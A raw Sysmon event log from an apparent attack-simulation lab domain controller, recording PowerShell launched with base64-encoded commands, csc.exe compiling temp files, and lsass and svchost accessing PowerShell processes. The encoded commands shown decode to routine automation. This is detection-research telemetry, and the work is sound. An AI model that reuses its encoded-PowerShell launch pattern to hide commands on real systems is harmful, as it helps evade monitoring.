10341000x80000000000000003440Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7CAB-5FA1-A700-000000008801}32801164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CAB-5FA1-A800-000000008801}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\f0ead6fa30602f351c05c321f84071ac\Microsoft.PowerShell.Commands.Utility.ni.dll+fadd0afc|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\f0ead6fa30602f351c05c321f84071ac\Microsoft.PowerShell.Commands.Utility.ni.dll+fadd0afc|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30bf8376(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30bd414f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30bd3e20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31685485(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b949b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30bf2e85(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30bd64ea(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30bd64ea(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30bd64ea(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30bd64ea(wow64) 154100x80000000000000003439Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7CAB-5FA1-A800-000000008801}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\r3opyxac\r3opyxac.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA9-5FA1-1A91-060000000000}0x6911a0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABHAGUAdAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByAA== 11241100x80000000000000003438Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.911{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\r3opyxac\r3opyxac.cmdline2020-11-03 15:52:11.911 11241100x80000000000000003437Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:11.911{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\r3opyxac\r3opyxac.dll2020-11-03 15:52:11.911 10341000x80000000000000003436Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.113{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003435Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.113{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003434Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.081{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_b2bixmcz.3we.ps12020-11-03 15:52:11.081 10341000x80000000000000003433Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.066{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003432Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.034{D28789B6-7CA9-5FA1-A000-000000008801}46365092C:\Windows\system32\conhost.exe{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003431Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003430Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003429Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003428Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003427Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003426Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003425Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003424Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003423Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003422Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.034{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003421Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.034{D28789B6-7CAA-5FA1-A300-000000008801}13322716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF8DC778890) 154100x80000000000000003420Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.046{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABHAGUAdAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA9-5FA1-1A91-060000000000}0x6911a0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003546Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.976{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003545Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.976{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003544Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.976{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 